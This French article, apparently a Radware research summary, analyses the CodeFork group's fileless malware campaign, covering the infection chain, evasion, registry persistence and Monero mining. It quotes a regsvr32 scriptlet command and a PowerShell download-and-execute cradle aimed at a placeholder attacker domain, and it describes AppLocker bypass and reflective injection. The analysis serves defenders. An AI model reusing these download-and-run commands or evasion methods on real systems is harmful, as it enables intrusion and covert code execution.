Rechercher
Contactez-nous Suivez-nous sur Twitter En francais English Language
 

De la Théorie à la pratique











Abonnez-vous gratuitement à notre NEWSLETTER

Newsletter FR

Newsletter EN

Vulnérabilités

Se désabonner

CodeFork lance une nouvelle campagne comprenant des techniques avancées d’évasion et de persistance File-less

septembre 2017 par Radware

Depuis 2015, l’équipe de recherche sur les logiciels malveillants Radware suit CodeFork - un groupe de pirates informatiques qui ont récemment lancé une nouvelle campagne avec des outils malveillants et des techniques d’infection mis à jour.

La nouvelle campagne comprend des techniques avancées d’évasion et de persistance File-less (sans fichier), ainsi qu’un nouveau module qui mine la crypto monnaie Monero.

Le groupe tire parti de ces infections pour vendre des services de spam, des vers informatiques et les téléchargeurs (et peut-être aussi des outils de vol d’informations). La version actuelle de l’outil est largement répandue dans de nombreuses entreprises et dans de nombreuses géographiques. La tactique d’évasion employée contourne les solutions de sécurité existantes en utilisant des techniques de persistance sans fichier. L’outil est parvenu à contourner plusieurs passerelles Web sécurisées et seuls les algorithmes de machine learning ont réussi à tracer ses communications. La combinaison de modules et de techniques diverses permet ainsi d’obtenir un outil très efficace.

CodeFork est un groupe prudent qui favorise les approches furtives, se faufilant généralement sous les radars des systèmes de défense traditionnels tels que le sandboxing, les scanners de pièces jointes aux courriers, IDS/IPS, les passerelles Web sécurisées et diverses solutions de protection des terminaux. Ils tirent parti - pour s’installer - des exécutables conçus pour les systèmes d’exploitation windows Windows OS et ne laissent aucune trace sur le disque.

Motif de préoccupation : le malware sans fichier

Alors que les versions précédentes de ce malware stockaient ses modules sur le système de fichiers, il utilise maintenant des techniques d’exécution et de persistance complètement dépourvues de fichiers. Aucun fichier suspect n’est stocké sur le disque. Cette technique permet aux attaquants de rester plus longtemps sur la machine infectée, puisque le malware ne peut être détecté par la plupart des solutions de protection des terminaux.

Des scripts PowerShell chargés dynamiquement, des techniques de chargement de type “reflective PE” (Portable Executable) et les techniques d’injection Process Hollowing sont utilisés pour obtenir une exécution pratique et silencieuse sans laisser de trace sur le système de fichiers.

Infection

Un vecteur d’infection commun a très probablement été utilisé contre la plupart des organisations ciblées. Par exemple, une pièce jointe à un courriel avec un document Microsoft Office contenant une macro malveillante.

La charge infectieuse lance la commande suivante : regsvr32 /s /u /i : http://xxx.somerandomevildomain.xx/... scrobj. dl

Regsvr32 est un utilitaire en ligne de commande Windows utilisé pour enregistrer et désenregistrer les fichiers DLL et les contrôles ActiveX dans le registre.

Les logiciels malveillants retirent plusieurs bénéfices de l’utilisation de Regsvr32 avec scrobj. dll :
• Il contourne les règles du script AppLocker
• Il prend en compte le proxy
• Il supporte le cryptage TLS
• Il suit les redirections HTTP
• Il ne laisse aucune trace sur le disque
• Il est généralement utilisé par les logiciels de pare-feu des terminaux, car il s’agit d’un exécutable Microsoft Windows légitime.

Le fichier evilpath. xml contient un fichier Windows Script Component. Il demande au moteur de script de Windows d’exécuter un code Javascript obscurci qui exécute powershell. exe avec les paramètres suivants :

C : \Windows\system32WindowsPowerShell\v1.0\v1.0\wowershell. exe -nop -ep Bypass -noexit -c[System. Net. ServicePointManager] :
ServerCertificateValidationCallback = $true  ; iex ((New-Object System. Net. WebClient). DownloadString

L’argument demande à PowerShell de télécharger un script depuis https://somerandomevildomain.xx /p1 somerandomfile ou https://somerandomevildomain.xx /p2 anotherrandomefile et de l’exécuter depuis la mémoire.

Cette méthode contourne les règles d’exécution locales qui pourraient restreindre l’exécution de scripts PowerShell non reconnus, comme l’exécution d’une simple commande PS autorisée par défaut.

Le script télécharge alors une DLL cryptée RC4 Encrypted DLL Executable à partir de https://somerandomevildomain.xx /favicon anotherrandomfile (appelé "dropper") et la décrypte. Il charge ensuite le script malveillant de manière “reflective” depuis la mémoire dans le processus powerhell. exe, en utilisant le module Invoke-ReflectivePEInjection du framework PowerSploit (c’est-à-dire un kit open source de scripts post-exploitation PowerShell). Jusqu’ à ce point, les fichiers ne sont ni stockés ni créés sur le disque, et les exécutables téléchargés sont transférés cryptés. Il s’agit d’une autre couche de sécurité de l’auteur du programme, donc IDS/IPS ne détectera pas ses modules à l’intérieur du trafic.

Déploiement

Une fois le chargeur de malware executé, son exportation "VoidFunc" est alors appelée. En guise de mécanisme d’antianalyse, le module vérifie le chemin C : \python27 sur la machine, ce qui peut lui indiquer si le système est celui d’un chercheur en sécurité ou encore un environnement sandbox.
Si le chemin existe, le malware annule l’opération. Ensuite, le module recherche powerhell. exe sur la machine. Puisque PowerShell est vital pour l’étape suivante, le module s’arrête si PowerShell n’est pas présent (ce qui est susceptible de se produire sur les anciennes configurations de Windows XP ou les environnements similaires).

Persistance

Pour rester sur la machine infectée après le redémarrage, deux valeurs de registre sont stockées sous HKEY_CURRENT_USER\SoftwareClassesClasses[Random String] (chaîne aléatoire)
Le script powerhell
Un nouveau module DLL RC4 encrypté

Execution

Le module suivant qui est lancé est un wrapper (emballage) pour le malware en-lui-même.

Pour discuter de ces questions techniques, nous vous proposons de vous mettre en contact avec Pascal Geenens, security evangelist pour Radware.




Voir les articles précédents

    

Voir les articles suivants